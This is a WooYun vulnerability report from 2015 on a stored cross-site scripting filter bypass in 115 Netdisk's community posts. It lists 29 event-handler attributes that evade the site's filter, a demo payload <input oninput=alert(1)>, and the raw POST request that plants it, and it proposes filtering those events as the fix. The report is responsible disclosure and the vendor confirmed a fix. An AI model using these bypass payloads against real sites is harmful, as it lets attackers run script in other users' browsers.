当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092959

漏洞标题:115网盘存储型xss过滤强势绕过

相关厂商:115网盘

漏洞作者: Mr .LZH

提交时间:2015-01-20 21:16

修复时间:2015-02-04 12:06

公开时间:2015-02-04 12:06

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-20: 细节已通知厂商并且等待厂商处理中
2015-01-20: 厂商已经确认,细节仅向厂商公开
2015-01-30: 细节向核心白帽子及相关领域专家公开
2015-02-04: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

为了绕过,fuzz了一晚上,累啊。。。。。

详细说明:

115网盘中进入圈子,发帖,尝试了很多payload不成功。
<script><iframe>等等标签被过滤。
onerror等等事件也被过滤。
经过一晚上事件fuzz,成功绕过,并总结出了29个可绕过的事件。

fscommand
onbegin
ondragdrop
onend
onhashchange
oninput
onmediacomplete
onmediaerror
onmessage
onoffline
onoutofsync
onpause
onpopstate
onprogress
onredo
onrepeat
onresume
onreverse
onrowsenter
onrowdelete
onrowinserted
onseek
onstorage
onsyncrestored
ontimeerror
ontrackchange
onundo
onurlflip
seeksegmenttime


演示例子:发帖,进入html编辑模式,输入payload: <input oninput=alert(1)>

2.jpg


post请求为:

POST /133130/post/save 
Host: q.115.com
gid=133130&allow_notice=1&fids=&pickcodes=&category=&anonymous=0&allow_cates=&allow_uids=&validate=qaze&evq2gry6dkx=NzhlZDRkYWE5ZDA2MGEyNjNhYWU0YTFmfDE0MjE3NTAyMDE!&offer_reward=0&fb_price=10&addition=&content=%3Cp%3E%26nbsp%3Baaaa%E2%80%8B%26nbsp%3B%26nbsp%3B%3Cinput+oninput%3D%22alert(1)%22+value%3D%22%22%3E%3C%2Fp%3E&


xss帖子地址为:http://q.115.com/t-133130-128569.html

1.jpg


这个例子需要在框里输入内容促发,其它事件有部分可自动促发,这里不做演示。

漏洞证明:

修复方案:

过滤一下事件:

fscommand
onbegin
ondragdrop
onend
onhashchange
oninput
onmediacomplete
onmediaerror
onmessage
onoffline
onoutofsync
onpause
onpopstate
onprogress
onredo
onrepeat
onresume
onreverse
onrowsenter
onrowdelete
onrowinserted
onseek
onstorage
onsyncrestored
ontimeerror
ontrackchange
onundo
onurlflip
seeksegmenttime


花了一晚时间fuzz,又给了如此完整的结果,rank希望不要太坑

版权声明:转载请注明来源 Mr .LZH@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-20 21:22

厂商回复:

感谢报告!

最新状态:

2015-02-04: